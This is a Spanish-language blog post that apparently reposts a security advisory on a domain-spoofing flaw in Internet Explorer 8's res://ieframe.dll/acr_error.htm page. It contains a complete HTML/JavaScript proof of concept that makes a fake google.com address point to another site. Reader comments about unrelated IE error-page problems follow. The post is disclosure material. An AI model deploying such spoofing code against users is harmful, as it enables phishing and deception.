###########################################
IE8 beta RC1 res: / / Ieframe.dll / acr_error.htm Spoff
Vendedor: http://www.microsoft.com
Avisado por: http://lostmon.blogspot.com/2009/03/ie8-beta-c1-resieframedllacrerrorhtm.html
Notificado al vendedor: Sí Disponibilidad del exploit: Sí
############################################
Internet Explorer 8 tiene una vulnerabilidad que permite a los usuarios remotos spoofear el nombre del dominio en ‘Ieframe.dll‘ que se establece en el archivo ‘acr_error.htm‘ en res: URI es desde donde maneja cualquier usuario remoto pudiendo así crear una URL maligna que muestra el nombre de dominio, por ejemplo, «google.com«, (pero si clickamos en la url de google nos lleva a otros sítios, es lo llamado spoofing)
#################
Prueba del concepto
#################
<html>
<head>
<script type=»text/javascript»>
function open_win()
{
window.open(«res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com»,»_blank»,»toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no»);
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title>
<body>
<form>
<input type=»button» value=»Open Window» onclick=»open_win()»>
</form>
</body>
</html>
#######################################
Thnx To estrella to be my ligth
Thnx to all Lostmon Team.
—
atentamente:
Lostmon (lostmon@gmail.com)
—————
thz Lost 😉
Brother pero seria bueno que dijeras como se puede reparar esta vulnerabilidad ya que me tiene al borde de la locura, es algo tan tedioso, te agradezco me colabores.
Saludos
lo mismo digo, pero a mi se me complica con delicious, me empezo a suceder desde q lo instale y es mas cuando una pagina me da este error se abre la busqueda de delicious, estoy pensando desinstalarlo mmm
Asi es, a mi tambie me tiene loco, tengo 4 dias tratando de repararlo…. 😦
Hi, I speaking from Brazil, and I have the same problem, but when I star internet explorer withour complements, the problem thus not exist more, I tried many things desable some complements but didn’t have success.
Please help me.
Thanks
Friends,
In the page that it was doing I withdrew the addresses of email what were joined to send through message, in other words, when this number of emails was big it was giving the problem. Now it is not giving any more, in spite of is not certain what is only that.
Thank you.
miren ami me tiene loco hace 4 dias q bengo renegando ese error hasta me cierra el explorer de una y el mozzila unica solucion desctivar todo lo q inicia en windows pero solo soluciono el mozzila totalmente y el explorer se repite el error infinitamente haciendo inmenzo la lina de la paguina repitiendo :
res://ieframe.dll/acr_error.htm#google.com.ar,http://www.google.com.ar/
alguien tiene una idea de como solucionar bien el problema?????
a mi tambien me pasa eso!!! alguna forma de repararlo??? tengo windows 7, y por mas que kiera volver a descargarlo no se puede!!!
mirar tengo un acer aspire 5738zg 500gb hdd windows 7 intel pentium, ati radeon hd 4570 graphics 512 mb.
soy un chabal de 11 años y me pasa lo mismo que a bosotros.
ahi dos tipos de internet explorer 32 bits y 64 bits ami el problema ese me pasa con el 32 bits y oi e intentado con el 64 bits i me ba como nunca!.no creo que os sirba para nada pero adios!
A mí me pasaba lo mismo pero seguí las instrucciones de esta página y no y he vuelto a tener ningún problema con el IE. También tengo Windows 7.
La página en cuestión es http://www.myantispyware.com/2009/12/02/how-to-remove-sshnas-dll-trojan-remove-trojan-fakealert/
Espero que les funcione.
hola a todos ejecuten el google como administrador hasta que solucionen el problema con eso se repara momentaneamente bye ….tengo el mismo problema si lo soluciono por completo les aviso ok
como solución provisional, me he creado otro usuario de windows 7 y desde allí sí funciona el IE
Lamentablemente en mi pc, no funciono, esto paso al instalar un servidor ftp. Pude recuperar firefox, pero el IE no. Además esto paso en mi perfil personal y pasar al perfil de administrador tengo el mismo error. A ver si alguíen mas nos puede ayudar.
yo oprimo F5 para quitar la compativilidad ed la web y me funciona el sitio que quiero visitar